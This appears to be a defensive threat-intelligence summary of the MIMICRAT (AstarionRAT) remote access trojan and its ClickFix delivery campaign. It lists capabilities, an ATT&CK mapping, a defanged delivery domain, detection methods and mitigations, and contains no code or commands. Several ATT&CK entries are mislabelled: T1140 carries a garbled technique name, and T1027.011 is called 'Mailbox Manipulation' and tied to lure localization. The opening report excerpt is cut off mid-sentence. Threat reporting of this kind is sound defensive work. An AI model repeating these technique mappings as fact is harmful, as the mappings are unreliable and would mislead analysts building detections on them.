Full Report
Cybersecurity researchers have disclosed details of a new ClickFix campaign that abuses compromised legitimate sites to deliver a previously undocumented remote access trojan (RAT) called MIMICRAT (aka AstarionRAT). "The campaign demonstrates a high level of operational sophistication: compromised sites spanning multiple industries and geographies serve as delivery infrastructure, a multi-stage
Analysis Summary
# Tool/Technique: MIMICRAT (aka AstarionRAT)
## Overview
MIMICRAT is an undocumented, sophisticated C++ remote access trojan (RAT) utilized in "ClickFix" social engineering campaigns. The malware is designed for post-exploitation activities, including data exfiltration and providing a foothold for potential ransomware deployment. It distinguishes itself through its use of Lua-scripted loaders and C2 traffic that mimics legitimate web analytics.
## Technical Details
- **Type**: Malware family (Remote Access Trojan)
- **Platform**: Windows
- **Capabilities**: Token impersonation, SOCKS5 tunneling, process/file manipulation, and credential theft.
- **First Seen**: February 2026
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1189 - Drive-by Compromise] (Compromised legitimate sites)
- **[TA0002 - Execution]**
- [T1059.001 - PowerShell] (Multi-stage PowerShell chain)
- [T1204.001 - User Execution: Malicious Link] (ClickFix lure)
- **[TA0005 - Defense Evasion]**
- [T1562.001 - Impair Defenses: Disable or Modify Tools] (ETW and AMSI patching)
- [T1140 - Deinterlace/Decrypt Files or Information] (Lua script decrypting shellcode)
- [T1027.011 - Obfuscated Files or Information: Mailbox Manipulation] (Lure localization)
- **[TA0004 - Privilege Escalation]**
- [T1134 - Access Token Manipulation] (Windows token impersonation)
- **[TA0011 - Command and Control]**
- [T1071.001 - Application Layer Protocol: Web Protocols] (HTTPS Port 443)
- [T1090.003 - Proxy: Multi-hop Proxy] (SOCKS5 tunneling)
## Functionality
### Core Capabilities
- **Comprehensive Command Set**: Supports 22 separate commands for full system control.
- **File & Process Management**: Allows attackers to view, modify, and terminate processes or files.
- **Interactive Shell**: Provides remote command-line access to the infected host.
- **Network Tunneling**: Integrated SOCKS5 proxy support to tunnel traffic through the victim's network.
### Advanced Features
- **Sophisticated Loader**: Uses a Lua-scripted engine to decrypt and execute shellcode in memory, minimizing the on-disk footprint.
- **Evasion Suite**: Actively patches Event Tracing for Windows (ETW) and Antimalware Scan Interface (AMSI) via PowerShell before the main payload is deployed.
- **C2 Camouflage**: Uses HTTP profiles that mimic legitimate web analytics traffic to blend in with standard enterprise network noise.
- **Dynamic Localization**: The ClickFix lure supports 17 languages, automatically adjusting based on the victim’s browser settings.
## Indicators of Compromise
- **File Hashes**: *Not provided in the source text; refer to Elastic Security Labs report.*
- **File Names**: Lua-based loader scripts, Matanbuchus 3.0 loader components.
- **Network Indicators**:
- bincheck[.]io (Compromised delivery site)
- C2 communication over HTTPS Port 443 (Mimicking analytics traffic)
- **Behavioral Indicators**:
- PowerShell execution via Windows "Run" dialog (Win+R).
- Unauthorized modifications to AMSI and ETW memory structures.
- Unexpected Lua interpreter activity on Windows endpoints.
## Associated Threat Actors
- **Unknown**: While specific attribution is not finalized, researchers note tactical and infrastructure overlaps with campaigns delivering the **Matanbuchus 3.0** loader.
## Detection Methods
- **Signature-based detection**: Scanning for the unique Lua-based loader and the C++-based MIMICRAT binary.
- **Behavioral detection**:
- Monitoring for PowerShell scripts that attempt to patch `amsi.dll` or `ntdll.dll` (ETW).
- Identifying "ClickFix" patterns: users copying/pasting complex commands into the "Run" dialog from a web browser.
- Detecting unusual process hollowing or shellcode injection initiated by a Lua interpreter.
## Mitigation Strategies
- **User Training**: Educate users never to copy and paste commands from websites into the Windows Run dialog or PowerShell.
- **Attack Surface Reduction**: Use Browser Isolation or restrict the execution of PowerShell for non-administrative users.
- **Endpoint Hardening**: Enable Constrained Language Mode in PowerShell and deploy robust Endpoint Detection and Response (EDR) tools to monitor for memory-only threats.
- **Web Filtering**: Block known malicious domains and implement inspection for encrypted HTTPS traffic.
## Related Tools/Techniques
- **ClickFix**: The social engineering framework used for initial delivery.
- **Matanbuchus 3.0**: A loader often seen in similar infrastructure setups.
- **AstarionRAT**: An alternative name for the MIMICRAT family.